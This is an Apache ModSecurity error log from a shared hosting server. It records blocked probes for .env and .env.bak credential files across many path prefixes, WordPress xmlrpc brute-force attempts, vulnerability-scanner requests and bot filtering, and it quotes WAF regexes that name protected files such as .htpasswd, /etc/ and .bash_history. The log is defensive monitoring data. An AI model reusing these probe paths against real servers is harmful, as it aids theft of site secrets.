[Tue May 26 13:47:32.871889 2026] [security2:error] [pid 555743:tid 555920] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/mail/.env"] [unique_id "ahVXHMjqAquC0YaxQjCjqQAAATk"]
[Tue May 26 13:47:33.168807 2026] [security2:error] [pid 555743:tid 555914] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/mailer/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjsQAAATM"]
[Tue May 26 13:47:33.417752 2026] [security2:error] [pid 555743:tid 555981] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/nginx/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjuAAAAXY"]
[Tue May 26 13:47:33.728673 2026] [security2:error] [pid 555743:tid 555890] [client 45.148.10.159:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/public/.env"] [unique_id "ahVXHcjqAquC0YaxQjCjwAAAARs"]
[Tue May 26 13:47:33.744426 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:34.369147 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:34.369192 2026] [security2:error] [pid 544395:tid 544598] [client 136.37.154.171:38529] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "atreegroup.com"] [uri "/wp-comments-post.php"] [unique_id "ahVXHRmrs7g3RMCdp8XtqAAAAEk"]
[Tue May 26 13:47:35.311025 2026] [core:crit] [pid 555743:tid 555904] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:35.382556 2026] [security2:error] [pid 555743:tid 555934] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/site/.env"] [unique_id "ahVXH8jqAquC0YaxQjCj7QAAAUc"]
[Tue May 26 13:47:35.514743 2026] [security2:error] [pid 555743:tid 555899] [client 129.222.147.134:17956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXH8jqAquC0YaxQjCj8gAAASQ"]
[Tue May 26 13:47:35.514888 2026] [security2:error] [pid 555743:tid 555899] [client 129.222.147.134:17956] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXH8jqAquC0YaxQjCj8gAAASQ"]
[Tue May 26 13:47:36.048512 2026] [security2:error] [pid 555743:tid 555905] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/xampp/.env"] [unique_id "ahVXIMjqAquC0YaxQjCj_AAAASo"]
[Tue May 26 13:47:36.063198 2026] [security2:error] [pid 555743:tid 555931] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXH8jqAquC0YaxQjCj9QAAAUQ"]
[Tue May 26 13:47:36.308392 2026] [security2:error] [pid 555743:tid 555908] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/main/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkAwAAAS0"]
[Tue May 26 13:47:36.583155 2026] [security2:error] [pid 555743:tid 555983] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/node_modules/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkCgAAAXg"]
[Tue May 26 13:47:36.828345 2026] [security2:error] [pid 555743:tid 555946] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/kyc/.env"] [unique_id "ahVXIMjqAquC0YaxQjCkDwAAAVM"]
[Tue May 26 13:47:37.021687 2026] [core:crit] [pid 555743:tid 555942] (13)Permission denied: [client 207.46.13.125:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:47:37.161755 2026] [security2:error] [pid 555743:tid 555921] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIcjqAquC0YaxQjCkHQAAATo"]
[Tue May 26 13:47:37.164084 2026] [security2:error] [pid 555743:tid 555873] [client 4.201.75.230:6089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/as.php"] [unique_id "ahVXIcjqAquC0YaxQjCkHgAAAQo"]
[Tue May 26 13:47:37.359567 2026] [autoindex:error] [pid 555743:tid 555916] [client 46.101.90.201:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:47:37.669060 2026] [core:error] [pid 555743:tid 555934] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:37.669083 2026] [core:error] [pid 555743:tid 555934] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:37.834515 2026] [security2:error] [pid 555743:tid 555950] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/prod/.env"] [unique_id "ahVXIcjqAquC0YaxQjCkNAAAAVc"]
[Tue May 26 13:47:37.907440 2026] [security2:error] [pid 544395:tid 544619] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXIRmrs7g3RMCdp8XtxgAAAF4"]
[Tue May 26 13:47:38.160603 2026] [security2:error] [pid 555743:tid 555879] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/.env.bak"] [unique_id "ahVXIsjqAquC0YaxQjCkPQAAARA"]
[Tue May 26 13:47:38.316372 2026] [autoindex:error] [pid 544395:tid 544648] [client 46.101.90.201:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:47:38.367035 2026] [security2:error] [pid 555743:tid 555952] [client 85.208.96.194:53146] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVXIsjqAquC0YaxQjCkRgAAAVk"]
[Tue May 26 13:47:38.367209 2026] [security2:error] [pid 555743:tid 555952] [client 85.208.96.194:53146] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVXIsjqAquC0YaxQjCkRgAAAVk"]
[Tue May 26 13:47:38.484412 2026] [security2:error] [pid 555743:tid 555907] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIsjqAquC0YaxQjCkSQAAASw"]
[Tue May 26 13:47:38.985087 2026] [security2:error] [pid 555743:tid 555991] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXIsjqAquC0YaxQjCkVAAAAU8"]
[Tue May 26 13:47:39.298407 2026] [security2:error] [pid 555743:tid 555969] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXI8jqAquC0YaxQjCkXwAAAWo"]
[Tue May 26 13:47:39.529316 2026] [security2:error] [pid 555743:tid 555925] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/website/.env"] [unique_id "ahVXI8jqAquC0YaxQjCkZwAAAT4"]
[Tue May 26 13:47:39.761579 2026] [security2:error] [pid 555743:tid 555895] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/development/.env"] [unique_id "ahVXI8jqAquC0YaxQjCkaAAAASA"]
[Tue May 26 13:47:40.015949 2026] [security2:error] [pid 555743:tid 555986] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/backend/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkcwAAAXs"]
[Tue May 26 13:47:40.257726 2026] [security2:error] [pid 555743:tid 555952] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/api/shared/config/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkeAAAAVk"]
[Tue May 26 13:47:40.343941 2026] [security2:error] [pid 555743:tid 555881] [client 20.206.67.134:4977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-plain.php"] [unique_id "ahVXJMjqAquC0YaxQjCkewAAARI"], referer: www.google.com
[Tue May 26 13:47:40.344803 2026] [security2:error] [pid 555743:tid 555883] [client 20.206.67.134:4891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXJMjqAquC0YaxQjCkfQAAARQ"], referer: www.google.com
[Tue May 26 13:47:40.357049 2026] [security2:error] [pid 555743:tid 555968] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXI8jqAquC0YaxQjCkcgAAAWk"]
[Tue May 26 13:47:40.479301 2026] [security2:error] [pid 555743:tid 555888] [client 45.148.10.159:56202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.soto-plumbing.com"] [uri "/api/shared/.env"] [unique_id "ahVXJMjqAquC0YaxQjCkiAAAARk"]
[Tue May 26 13:47:40.850909 2026] [security2:error] [pid 555743:tid 555890] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCkkwAAARs"]
[Tue May 26 13:47:41.207204 2026] [security2:error] [pid 555743:tid 555916] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJcjqAquC0YaxQjCkogAAATU"]
[Tue May 26 13:47:41.339735 2026] [security2:error] [pid 555743:tid 555982] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCknQAAAXc"]
[Tue May 26 13:47:41.407597 2026] [security2:error] [pid 544395:tid 544592] [client 4.201.75.230:6112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "athelstan.org.in"] [uri "/wp-trackback.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt7gAAAEM"]
[Tue May 26 13:47:41.558945 2026] [security2:error] [pid 544395:tid 544556] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt8QAAAB8"]
[Tue May 26 13:47:41.631681 2026] [security2:error] [pid 555743:tid 555950] [client 20.206.67.134:1587] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahVXJMjqAquC0YaxQjCkegAAAVc"], referer: www.google.com
[Tue May 26 13:47:41.864405 2026] [security2:error] [pid 544395:tid 544598] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJRmrs7g3RMCdp8Xt-AAAAEk"]
[Tue May 26 13:47:42.138915 2026] [core:error] [pid 555743:tid 555938] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:42.138939 2026] [core:error] [pid 555743:tid 555938] [client 46.101.90.201:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://www.vishaal-shah.moes-art.com/
[Tue May 26 13:47:42.189943 2026] [security2:error] [pid 555743:tid 555887] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkugAAARg"]
[Tue May 26 13:47:42.343841 2026] [security2:error] [pid 555743:tid 555886] [client 20.206.67.134:4885] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXJsjqAquC0YaxQjCkxQAAARc"]
[Tue May 26 13:47:42.371723 2026] [security2:error] [pid 555743:tid 555883] [client 20.206.67.134:1587] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkwQAAARQ"], referer: www.google.com
[Tue May 26 13:47:42.544714 2026] [security2:error] [pid 555743:tid 555980] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCkzgAAAXU"]
[Tue May 26 13:47:42.818274 2026] [security2:error] [pid 555743:tid 555899] [client 106.192.248.115:60537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1QAAASQ"]
[Tue May 26 13:47:42.818432 2026] [security2:error] [pid 555743:tid 555899] [client 106.192.248.115:60537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXJsjqAquC0YaxQjCk1QAAASQ"]
[Tue May 26 13:47:42.885749 2026] [security2:error] [pid 555743:tid 555995] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.soto-plumbing.com"] [uri "/index.php"] [unique_id "ahVXJsjqAquC0YaxQjCk2wAAAYQ"]
[Tue May 26 13:47:43.059903 2026] [autoindex:error] [pid 555743:tid 555992] [client 146.56.199.139:0] AH01276: Cannot serve directory /home2/glorolle/public_html/aeromodellingconsultants.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.aeromodellingconsultants.com
